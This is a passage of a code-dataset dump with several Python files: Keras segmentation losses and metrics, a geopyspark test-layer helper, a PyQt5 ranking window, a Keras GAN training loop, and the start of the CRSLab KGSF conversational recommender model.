encoder_weights=init_weights_with)\n        return model\n    elif segmentation_model.lower() == 'pspnet':\n        from segmentation_models import PSPNet\n        #from segmentation_models.backbones import get_preprocessing\n\n        model = PSPNet(backbone_name=backbone_name,\n                       input_shape=(input_width, input_height, n_channels),\n                       classes=n_classes,\n                       encoder_weights=init_weights_with)\n        return model\n    elif segmentation_model.lower() == 'linknet':\n        from segmentation_models import Linknet\n        #from segmentation_models.backbones import get_preprocessing\n\n        # First check if input size is compatible with linknet \n        check_image_size(segmentation_model, input_width, input_height)\n        \n        model = Linknet(backbone_name=backbone_name,\n                        input_shape=(input_width, input_height, n_channels),\n                        classes=n_classes,\n                        encoder_weights=init_weights_with)\n        return model\n    else:\n        raise Exception(f\"Unknown segmentation_model: {segmentation_model}\")\n\ndef compile_model(model,\n                  optimizer,\n                  loss_mode='binary_crossentropy',\n                  metrics=None):\n\n    if loss_mode == \"bcedice\":\n        loss_func = dice_coef_loss_bce\n    elif loss_mode == \"binary_crossentropy\":\n        loss_func = \"binary_crossentropy\"\n    else:\n        raise Exception(f\"Unknown loss function: {loss_mode}\")\n\n    # TODO: implement option to specify metrics...\n    model.compile(optimizer=optimizer, loss=loss_func,\n                  metrics=[jaccard_coef, jaccard_coef_flat,\n                           jaccard_coef_int, dice_coef, 'accuracy', 'binary_accuracy'])\n\n    return model\n\ndef load_model(model_to_use_filepath: str):\n    model = kr.models.load_model(model_to_use_filepath,\n                                 custom_objects={'jaccard_coef': jaccard_coef,\n                                                 'jaccard_coef_flat': jaccard_coef_flat,\n                                                 'jaccard_coef_int': jaccard_coef_int,\n                                                 'dice_coef': dice_coef})\n\n    return model\n\ndef check_image_size(segmentation_model: str,\n                     input_width: int, \n                     
input_height: int):\n    if segmentation_model.lower() == 'linknet':\n        if((input_width and (input_width % 16) != 0) \n            or (input_height and (input_height % 16) != 0)):\n            message = f\"STOP: input_width ({input_width}) and input_height ({input_height}) should be divisible by 16!\"\n            logger.error(message)\n            raise Exception(message)\n    else:\n        logger.info(\"check_image_size is not implemented for this model!\")\n        \n#------------------------------------------\n# Loss functions\n#------------------------------------------\n\ndef dice_coef_loss(y_true, y_pred):\n    return 1 - dice_coef(y_true, y_pred)\n\ndef bootstrapped_crossentropy(y_true, y_pred, bootstrap_type='hard', alpha=0.95):\n    target_tensor = y_true\n    prediction_tensor = y_pred\n    _epsilon = kr.backend.tensorflow_backend._to_tensor(kr.backend.epsilon(), prediction_tensor.dtype.base_dtype)\n    prediction_tensor = kr.backend.tf.clip_by_value(prediction_tensor, _epsilon, 1 - _epsilon)\n    prediction_tensor = kr.backend.tf.log(prediction_tensor / (1 - prediction_tensor))\n\n    if bootstrap_type == 'soft':\n        bootstrap_target_tensor = alpha * target_tensor + (1.0 - alpha) * kr.backend.tf.sigmoid(prediction_tensor)\n    else:\n        bootstrap_target_tensor = alpha * target_tensor + (1.0 - alpha) * kr.backend.tf.cast(\n            kr.backend.tf.sigmoid(prediction_tensor) > 0.5, kr.backend.tf.float32)\n    return kr.backend.mean(kr.backend.tf.nn.sigmoid_cross_entropy_with_logits(\n        labels=bootstrap_target_tensor, logits=prediction_tensor))\n\ndef dice_coef_loss_bce(y_true, y_pred):\n    dice = 0.5\n    bce = 0.5\n    bootstrapping = 'hard'\n    alpha = 1.\n    return bootstrapped_crossentropy(y_true, y_pred, bootstrapping, alpha) * bce + dice_coef_loss(y_true, y_pred) * dice\n\n#------------------------------------------\n# Metrics functions\n#------------------------------------------\n\nSMOOTH_LOSS = 1e-12\n\ndef jaccard_coef(y_true, y_pred):\n    intersection = kr.backend.sum(y_true * y_pred, axis=[0, -1, -2])\n    sum_ = kr.backend.sum(y_true + y_pred, axis=[0, -1, -2])\n\n    jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + SMOOTH_LOSS)\n\n    return kr.backend.mean(jac)\n\ndef jaccard_coef_int(y_true, y_pred):\n    y_pred_pos = kr.backend.round(kr.backend.clip(y_pred, 0, 1))\n\n    intersection = kr.backend.sum(y_true * y_pred_pos, axis=[0, -1, -2])\n    sum_ = kr.backend.sum(y_true + y_pred_pos, axis=[0, -1, -2])\n    jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + SMOOTH_LOSS)\n    return kr.backend.mean(jac)\n\ndef jaccard_coef_flat(y_true, y_pred):\n    y_true_f = kr.backend.flatten(y_true)\n    y_pred_f = kr.backend.flatten(y_pred)\n    intersection = kr.backend.sum(y_true_f * y_pred_f)\n    return (intersection + SMOOTH_LOSS) / (kr.backend.sum(y_true_f) + kr.backend.sum(y_pred_f) - intersection + SMOOTH_LOSS)\n\ndef dice_coef(y_true, y_pred, smooth=1.0):\n    y_true_f = kr.backend.flatten(y_true)\n    y_pred_f = kr.backend.flatten(y_pred)\n    intersection = kr.backend.sum(y_true_f * y_pred_f)\n    return (2. 
* intersection + smooth) / (kr.backend.sum(y_true_f) + kr.backend.sum(y_pred_f) + smooth)\n\ndef pct_wrong(y_true, y_pred):\n y_pred_pos = kr.backend.round(kr.backend.clip(y_pred, 0, 1))\n\n intersection = kr.backend.sum(y_true * y_pred_pos, axis=[0, -1, -2])\n sum_ = kr.backend.sum(y_true + y_pred_pos, axis=[0, -1, -2])\n jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + SMOOTH_LOSS)\n return kr.backend.mean(jac)\n","sub_path":"model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159200387","text":"import datetime\n\nimport numpy as np\nfrom geopyspark import geopyspark_conf\nfrom geopyspark.geotrellis import (SpaceTimeKey, Tile, _convert_to_unix_time)\nfrom geopyspark.geotrellis.constants import LayerType\nfrom geopyspark.geotrellis.layer import TiledRasterLayer\nfrom pyspark import SparkContext\n\nfrom openeogeotrellis.configparams import ConfigParams\n\n\nclass TestLayers:\n\n def __init__(self):\n master_str = \"local[*]\"\n\n conf = geopyspark_conf(master=master_str, appName=\"test\")\n conf.set('spark.kryoserializer.buffer.max', value='1G')\n conf.set('spark.ui.enabled', True)\n\n if ConfigParams().is_ci_context:\n conf.set(key='spark.driver.memory', value='2G')\n conf.set(key='spark.executor.memory', value='2G')\n\n\n self.pysc = SparkContext.getOrCreate(conf)\n\n self.first = np.zeros((1, 4, 4))\n self.first.fill(1)\n\n self.second = np.zeros((1, 4, 4))\n self.second.fill(2)\n\n self.extent = {'xmin': 0.0, 'ymin': 0.0, 'xmax': 4.0, 'ymax': 4.0}\n self.layout = {'layoutCols': 1, 'layoutRows': 1, 'tileCols': 4, 'tileRows': 4}\n\n self.now = datetime.datetime.strptime(\"2017-09-25T11:37:00Z\", '%Y-%m-%dT%H:%M:%SZ')\n\n def create_spacetime_layer(self):\n cells = np.array([self.first, self.second], dtype='int')\n tile = Tile.from_numpy_array(cells, -1)\n\n layer = [(SpaceTimeKey(0, 0, self.now), tile),\n (SpaceTimeKey(1, 0, self.now), tile),\n (SpaceTimeKey(0, 1, self.now), tile),\n (SpaceTimeKey(1, 1, self.now), tile)]\n\n rdd = self.pysc.parallelize(layer)\n\n metadata = {'cellType': 'int32ud-1',\n 'extent': self.extent,\n 'crs': '+proj=longlat +datum=WGS84 +no_defs ',\n 'bounds': {\n 'minKey': {'col': 0, 'row': 0, 'instant': _convert_to_unix_time(self.now)},\n 'maxKey': {'col': 1, 'row': 1, 'instant': _convert_to_unix_time(self.now)}\n },\n 'layoutDefinition': {\n 'extent': self.extent,\n 'tileLayout': self.layout\n }\n }\n\n return TiledRasterLayer.from_numpy_rdd(LayerType.SPACETIME, rdd, metadata)\n","sub_path":"openeogeotrellis/testlayers.py","file_name":"testlayers.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585509756","text":"import sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nimport MainWindow\n\n\n# 通关挑战排行榜\nclass RankWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n palette = QPalette()\n palette.setBrush(QPalette.Background, QBrush(QPixmap('bg.JPG')))\n self.setPalette(palette)\n\n self.setWindowTitle('往次得分')\n self.setWindowModality(Qt.ApplicationModal)\n self.resize(528, 530)\n self.setFixedSize(528, 530)\n self.initUI()\n\n def initUI(self):\n layout = QHBoxLayout()\n # 表格布局\n tablewidget = QTableWidget()\n tablewidget.setRowCount(10)\n tablewidget.setColumnCount(4)\n layout.addWidget(tablewidget)\n tablewidget.setHorizontalHeaderLabels(['排名', '记录日期', '通关数', 
'总时间(s)'])\n tablewidget.verticalHeader().setVisible(False)\n file = open('rank.txt')\n rank = []\n while True:\n line = file.readline()\n if not line:\n break\n rank.append(line)\n file.close()\n i = 0\n for item in rank:\n item = item.replace('\\n', '')\n list = item.split(' ')\n temp = QTableWidgetItem(str(i + 1))\n temp.setTextAlignment(Qt.AlignCenter)\n tablewidget.setItem(i, 0, temp)\n for j in range(3):\n # 对每一个位置,加入表格布局item\n temp = QTableWidgetItem(list[j])\n temp.setTextAlignment(Qt.AlignCenter)\n tablewidget.setItem(i, j + 1, temp)\n i = i + 1\n # 禁止编辑\n tablewidget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n # 整行选择\n tablewidget.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n toolbar = self.addToolBar('返回')\n new = QAction(QIcon('home.png'), '返回', self)\n toolbar.addAction(new)\n toolbar.actionTriggered.connect(self.back)\n toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)\n\n mainframe = QWidget()\n mainframe.setLayout(layout)\n self.setCentralWidget(mainframe)\n\n self.setLayout(layout)\n\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, '退出游戏', '你确定退出游戏吗?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def back(self):\n self.hide()\n self.father = MainWindow.MainWindow()\n self.father.show()\n\n","sub_path":"GUI/RankWindow.py","file_name":"RankWindow.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234520919","text":"\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Imports #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\nimport cv2\nimport keras\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom tensorflow.keras.optimizers import Adam\nfrom keras.models import Sequential, load_model, model_from_yaml\nfrom keras.layers import Conv2D, Dense, MaxPooling2D, Flatten, Reshape, UpSampling2D, SpatialDropout2D\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# CHARGER + PREPARER IMAGE REELLES DATA #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\noptimizer = Adam(lr=0.0002, beta_1=0.5)\n\nimages_vraies =[]\n\nnoms_image = glob(\"dataSet/*\")\n\nfor nom in tqdm(noms_image):\n\timage = cv2.imread(nom, cv2.IMREAD_COLOR)\n\timage = cv2.resize(image, (256,256))\n\timage = image.astype(\"float32\")\t\n\timage = (image-127.5)/127.5\n\timages_vraies.append(image)\n\nimages_vraies = np.array(images_vraies)\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer Discriminateur #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ndiscriminateur = Sequential()\n\ndiscriminateur.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(256,256,3))) #Changer les dimensions de l'image ici\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(32, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(64, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(128, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 
2)))\n\ndiscriminateur.add(Flatten())\n\ndiscriminateur.add(Dense(128, activation = \"relu\" ))\ndiscriminateur.add(Dense(1, activation = \"sigmoid\" ))\n\ndiscriminateur.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','w') as log:\n discriminateur.summary(print_fn=lambda x: log.write(x + '\\n'))\n log.writelines([\"\\n\\n\"])\n log.writelines([\"#######################################################################\\n\"])\n log.writelines([\"#######################################################################\\n\\n\\n\"])\n\ndiscriminateur.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer Générateur #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ngenerateur = Sequential()\n\ngenerateur.add(Dense(16*16*256, activation='relu' , input_shape=(100,)))\ngenerateur.add(Reshape((16, 16, 256))) # 16x16\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 16x16 -> 32x32\ngenerateur.add(Conv2D(128, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 32x32 -> 64x64\ngenerateur.add(Conv2D(64, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 64x64 -> 128x128\ngenerateur.add(Conv2D(32, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 128x128 -> 256x256\ngenerateur.add(Conv2D(16, kernel_size=3, padding='same', activation='relu'))\n\n#generateur.add(UpSampling2D(size=(2, 2))) # 256x256 -> 512x512\n#generateur.add(Conv2D(8, kernel_size=3, padding='same', activation='relu'))\n\n\ngenerateur.add(Conv2D(3, kernel_size=(2, 2),padding='same', activation='tanh' ))\ngenerateur.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','a') as log:\n generateur.summary(print_fn=lambda x: log.write(x + '\\n'))\n log.writelines([\"\\n\\n\"])\n log.writelines([\"#######################################################################\\n\"])\n log.writelines([\"#######################################################################\\n\\n\\n\"]) \n#On n'entraine pas le générateur tout seul du coup on ne le compile pas\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer COMBO #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ncombo = Sequential()\ncombo.add(generateur)\ncombo.add(discriminateur)\n\ndiscriminateur.trainable = False\ncombo.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\ncombo.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','a') as log:\n combo.summary(print_fn=lambda x: log.write(x + '\\n'))\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Entrainer #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\niterations = 200000\ndemi_batch= 16\n\n#plusieurs itération\nfor iteration in range(iterations):\n\tos.system('cls' if os.name == 'nt' else 'clear')# Clean la console à chaque boucle\n\tprint()\n\tprint(\" ##########################\")\n\tprint(\" Boucle n°\"+str(iteration)+\"/\"+str(iterations))\n\tprint(\" ##########################\")\n\t################################################\n\t# créer pack de données pour le discriminateur #\n\t################################################\n\n\t# etape 1 : prendre des bonnes images\n\t# etape 2 : créer les labels (1 pour vrai) pour les bonnes 
images du dataset\n\t# etape 3 : generer des mauvaises images\n\t# etape 4 : créer les labels (0 pour faux) pour les mauvaises images générés\n\n\tx = []\n\ty = []\n\n\t# etape 1 : prendre des bonnes images\n\timages_bonnes = images_vraies[np.random.randint(0, images_vraies.shape[0], size=demi_batch)]\n\t# etape 2 : créer les labels (1 pour vrai) pour les bonnes images du dataset\n\tlabels_bonnes = np.ones(demi_batch) #un tableau avec 1000 fois le label 1\n\t# etape 3 : generer des mauvaises images\n\tbruit = np.random.normal(0, 1, size=[demi_batch,100]) # 1000 tableaux de 100 nombres aléatoires\n\timages_mauvaises = generateur.predict(bruit) # milles images générées\n\t# etape 4 : créer les labels (0 pour faux) pour les mauvaises images générés\n\tlabels_mauvaises = np.zeros(demi_batch)\n\n\tx = np.concatenate([images_bonnes,images_mauvaises])\n\ty = np.concatenate([labels_bonnes,labels_mauvaises])\n\n\t############################\n\t# entrainer discriminateur #\n\t############################\n\n\tdiscriminateur.trainable = True\n\tprint()\n\tprint(\"Entrainement du discriminateur :\")\n\tprint()\n\tdiscriminateur.fit(x,y, epochs = 1, batch_size=32)\n\n\n\t#######################################\n\t# créer pack de données pour le combo #\n\t#######################################\n\n\t# generer du bruit\n\tbruit = np.random.normal(0, 1, size=[demi_batch,100]) # 1000 tableaux de 100 nombres aléatoires\n\t# créer les labels 1\n\tlabels_combo = np.ones(demi_batch)\n\n\n\t###################\n\t# entrainer combo #\n\t###################\n\tprint()\n\tprint(\"Entrainement du Générateur :\")\n\tprint()\n\tdiscriminateur.trainable = False\n\tcombo.fit(bruit,labels_combo, epochs=1, batch_size=32)\n\n\t######################################\n\t# Généreration d'image et sauvegarde #\n\t######################################\n\tif iteration % 25 == 0 :\n\t\tbruit = np.random.normal(0, 1, size=[1, 100])\n\t\tprint(\"Génération d'image...\")\n\t\tprint()\n\t\timage = generateur.predict(bruit)\n\t\timage = (image*127.5)+127.5\n\t\timage = image.astype(\"uint8\")\n\t\timage = image.reshape((256,256,3))\n\t\timname = \"genim_\"+str(iteration)+\".png\"\n\t\tcv2.imwrite(\"Images/\" +imname, image)\n\n\n\t#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n\t# Sauvegarde des Models toutes les 100 boucles #\n\t#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n\tif iteration % 500 == 0 and iteration != 0 :\n\t\tprint()\n\t\tprint(\"Sauvegarde des models...\")\n\t\tprint()\n\t\tdiscriminateur.save(\"Discriminateurs/discriminateur_epoch\"+str(iteration)+\".h5\")\n\t\tgenerateur.save(\"Generateurs/generateur_epoch\"+str(iteration)+\".h5\")\n","sub_path":"GAN/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466185615","text":"# @Time : 2020/11/22\n# @Author : Kun Zhou\n# @Email : francis_kun_zhou@163.com\n\n# UPDATE:\n# @Time : 2020/11/24, 2020/12/29, 2021/1/4\n# @Author : Kun Zhou, Xiaolei Wang, Yuanhang Zhou\n# @Email : francis_kun_zhou@163.com, wxl1999@foxmail.com, sdzyh002@gmail.com\n\nr\"\"\"\nKGSF\n====\nReferences:\n Zhou, Kun, et al. `\"Improving Conversational Recommender Systems via Knowledge Graph based Semantic Fusion.\"`_ in KDD 2020.\n\n.. 
_`\"Improving Conversational Recommender Systems via Knowledge Graph based Semantic Fusion.\"`:\n https://dl.acm.org/doi/abs/10.1145/3394486.3403143\n\n\"\"\"\n\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom loguru import logger\nfrom torch import nn\nfrom torch_geometric.nn import GCNConv, RGCNConv\n\nfrom crslab.model.base import BaseModel\nfrom crslab.model.utils.functions import edge_to_pyg_format\nfrom crslab.model.utils.modules.attention import SelfAttentionSeq\nfrom crslab.model.utils.modules.transformer import TransformerEncoder\nfrom crslab.utils.download import DownloadableFile\nfrom crslab.model.utils.modules.transformer import MultiHeadAttention, TransformerFFN, _create_selfattn_mask, \\\n _normalize, \\\n create_position_codes\nfrom crslab.utils import ModelType\n\nresources = {\n 'ReDial': {\n 'version': '0.2',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EXl2bhU82O5Itp9K4Mh41mYB69BKPEvMcKwZRstfYZUB1g?download=1',\n 'kgsf_redial.zip',\n 'f627841644a184079acde1b0185e3a223945061c3a591f4bc0d7f62e7263f548',\n ),\n },\n 'TGReDial': {\n 'version': '0.2',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/ETzJ0-QnguRKiKO_ktrTDZQBZHKom4-V5SJ9mhesfXzrWQ?download=1',\n 'kgsf_tgredial.zip',\n 'c9d054b653808795035f77cb783227e6e9a938e5bedca4d7f88c6dfb539be5d1',\n ),\n },\n 'GoRecDial': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EUfPcGfLHAJPj-F3Mr79CF4Bc5sZXKk-jysutrjiRcQvCg?download=1',\n 'kgsf_gorecdial.zip',\n '9794abf12b5d6773d867556685da14d951d42f64a5c4781af7d6fb720e87ec4f',\n )\n },\n 'OpenDialKG': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EQgebOKypMlPr18KJ6uGeDABtqTbMQYVYNWNR_DaAZ1Wvg?download=1',\n 'kgsf_opendialkg.zip',\n '89b785b23478b1d91d6ab4f34a3658e82b52dcbb73828713a9b369fa49db9e61'\n )\n },\n 'Inspired': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EXQGUxjGQ-ZKpzTnUYOMavABMUAxb0JwkiIMAPp5DIvsNw?download=1',\n 'kgsf_inspired.zip',\n '23dfc031a3c71f2a52e29fe0183e1a501771b8d431852102ba6fd83d971f928d'\n )\n },\n 'DuRecDial': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/Ed9-qLkK0bNCk5AAvJpWU3cBC-cXks-6JlclYp08AFovyw?download=1',\n 'kgsf_durecdial.zip',\n 'f9a39c2382efe88d80ef14d7db8b4cbaf3a6eb92a33e018dfc9afba546ba08ef'\n )\n }\n}\n\n\nclass KGSFModel(BaseModel):\n \"\"\"\n\n Attributes:\n vocab_size: A integer indicating the vocabulary size.\n pad_token_idx: A integer indicating the id of padding token.\n start_token_idx: A integer indicating the id of start token.\n end_token_idx: A integer indicating the id of end token.\n token_emb_dim: A integer indicating the dimension of token embedding layer.\n pretrain_embedding: A string indicating the path of pretrained embedding.\n n_word: A integer indicating the number of words.\n n_entity: A integer indicating the number of entities.\n pad_word_idx: A integer indicating the id of word padding.\n pad_entity_idx: A integer indicating the id of entity padding.\n num_bases: A integer indicating the number of bases.\n kg_emb_dim: A integer indicating the dimension of kg embedding.\n n_heads: A integer indicating the number of heads.\n n_layers: A integer indicating 
the number of layer.\n ffn_size: A integer indicating the size of ffn hidden.\n dropout: A float indicating the dropout rate.\n attention_dropout: A integer indicating the dropout rate of attention layer.\n relu_dropout: A integer indicating the dropout rate of relu layer.\n learn_positional_embeddings: A boolean indicating if we learn the positional embedding.\n embeddings_scale: A boolean indicating if we use the embeddings scale.\n reduction: A boolean indicating if we use the reduction.\n n_positions: A integer indicating the number of position.\n response_truncate = A integer indicating the longest length for response generation.\n pretrained_embedding: A string indicating the path of pretrained embedding.\n\n \"\"\"\n model_type = ModelType.GENERATION\n\n def __init__(self, opt, device, other_data):\n \"\"\"\n\n Args:\n opt (Config or dict): A dictionary record the hyper parameters.\n device (torch.device): A variable indicating which device to place the data and model.\n other_data (dict): A dictionary record the other data.\n\n \"\"\"\n self.device = device\n self.gpu = opt.get(\"gpu\", [-1])\n # vocab\n self.vocab_size = other_data['vocab']['vocab_size']\n self.pad_token_idx = other_data['vocab']['pad']\n self.start_token_idx = other_data['vocab']['start']\n self.end_token_idx = other_data['vocab']['end']\n self.token_emb_dim = opt['token_emb_dim']\n self.pretrained_embedding = other_data.get('embedding', None)\n # kg\n self.n_word = other_data['vocab']['n_word']\n self.n_entity = other_data['vocab']['n_entity']\n self.pad_word_idx = other_data['vocab']['pad_word']\n self.pad_entity_idx = other_data['vocab']['pad_entity']\n entity_kg = other_data['entity_kg']\n self.n_relation = entity_kg['n_relation']\n entity_edges = entity_kg['edge']\n self.entity_edge_idx, self.entity_edge_type = edge_to_pyg_format(entity_edges, 'RGCN')\n self.entity_edge_idx = self.entity_edge_idx.to(device)\n self.entity_edge_type = self.entity_edge_type.to(device)\n word_edges = other_data['word_kg']['edge']\n\n self.word_edges = edge_to_pyg_format(word_edges, 'GCN').to(device)\n\n self.num_bases = opt['num_bases']\n self.kg_emb_dim = opt['kg_emb_dim']\n # transformer\n self.n_heads = opt['n_heads']\n self.n_layers = opt['n_layers']\n self.ffn_size = opt['ffn_size']\n self.dropout = opt['dropout']\n self.attention_dropout = opt['attention_dropout']\n self.relu_dropout = opt['relu_dropout']\n self.learn_positional_embeddings = opt['learn_positional_embeddings']\n self.embeddings_scale = opt['embeddings_scale']\n self.reduction = opt['reduction']\n self.n_positions = opt['n_positions']\n self.response_truncate = opt.get('response_truncate', 20)\n # copy mask\n dataset = opt['dataset']\n dpath = os.path.join(opt.model_path, \"kgsf\", dataset)\n resource = resources[dataset]\n super(KGSFModel, self).__init__(opt, device, dpath, resource)\n\n def build_model(self):\n self._init_embeddings()\n self._build_kg_layer()\n self._build_infomax_layer()\n self._build_recommendation_layer()\n self._build_conversation_layer()\n\n def _init_embeddings(self):\n if self.pretrained_embedding is not None:\n self.token_embedding = nn.Embedding.from_pretrained(\n torch.as_tensor(self.pretrained_embedding, dtype=torch.float), freeze=False,\n padding_idx=self.pad_token_idx)\n else:\n self.token_embedding = nn.Embedding(self.vocab_size, self.token_emb_dim, self.pad_token_idx)\n nn.init.normal_(self.token_embedding.weight, mean=0, std=self.kg_emb_dim ** -0.5)\n nn.init.constant_(self.token_embedding.weight[self.pad_token_idx], 0)\n\n 
self.word_kg_embedding = nn.Embedding(self.n_word, self.kg_emb_dim, self.pad_word_idx)\n nn.init.normal_(self.word_kg_embedding.weight, mean=0, std=self.kg_emb_dim ** -0.5)\n nn.init.constant_(self.word_kg_embedding.weight[self.pad_word_idx], 0)\n\n logger.debug('[Finish init embeddings]')\n\n def _build_kg_layer(self):\n # db encoder\n self.entity_encoder = RGCNConv(self.n_entity, self.kg_emb_dim, self.n_relation, self.num_bases)\n self.entity_self_attn = SelfAttentionSeq(self.kg_emb_dim, self.kg_emb_dim)\n\n # concept encoder\n self.word_encoder = GCNConv(self.kg_emb_dim, self.kg_emb_dim)\n self.word_self_attn = SelfAttentionSeq(self.kg_emb_dim, self.kg_emb_dim)\n\n # gate mechanism\n self.gate_layer = GateLayer(self.kg_emb_dim)\n\n logger.debug('[Finish build kg layer]')\n\n def _build_infomax_layer(self):\n self.infomax_norm = nn.Linear(self.kg_emb_dim, self.kg_emb_dim)\n self.infomax_bias = nn.Linear(self.kg_emb_dim, self.n_entity)\n self.infomax_loss = nn.MSELoss(reduction='sum')\n\n logger.debug('[Finish build infomax layer]')\n\n def _build_recommendation_layer(self):\n self.rec_bias = nn.Linear(self.kg_emb_dim, self.n_entity)\n self.rec_loss = nn.CrossEntropyLoss()\n\n logger.debug('[Finish build rec layer]')\n\n def _build_conversation_layer(self):\n self.register_buffer('START', torch.tensor([self.start_token_idx], dtype=torch.long))\n self.conv_encoder = TransformerEncoder(\n n_heads=self.n_heads,\n n_layers=self.n_layers,\n embedding_size=self.token_emb_dim,\n ffn_size=self.ffn_size,\n vocabulary_size=self.vocab_size,\n embedding=self.token_embedding,\n dropout=self.dropout,\n attention_dropout=self.attention_dropout,\n relu_dropout=self.relu_dropout,\n padding_idx=self.pad_token_idx,\n learn_positional_embeddings=self.learn_positional_embeddings,\n embeddings_scale=self.embeddings_scale,\n reduction=self.reduction,\n n_positions=self.n_positions,\n )\n\n self.conv_entity_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_entity_attn_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_word_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_word_attn_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n\n self.copy_norm = nn.Linear(self.ffn_size * 3, self.token_emb_dim)\n self.copy_output = nn.Linear(self.token_emb_dim, self.vocab_size)\n self.copy_mask = torch.as_tensor(np.load(os.path.join(self.dpath, \"copy_mask.npy\")).astype(bool),\n ).to(self.device)\n\n self.conv_decoder = TransformerDecoderKG(\n self.n_heads, self.n_layers, self.token_emb_dim, self.ffn_size, self.vocab_size,\n embedding=self.token_embedding,\n dropout=self.dropout,\n attention_dropout=self.attention_dropout,\n 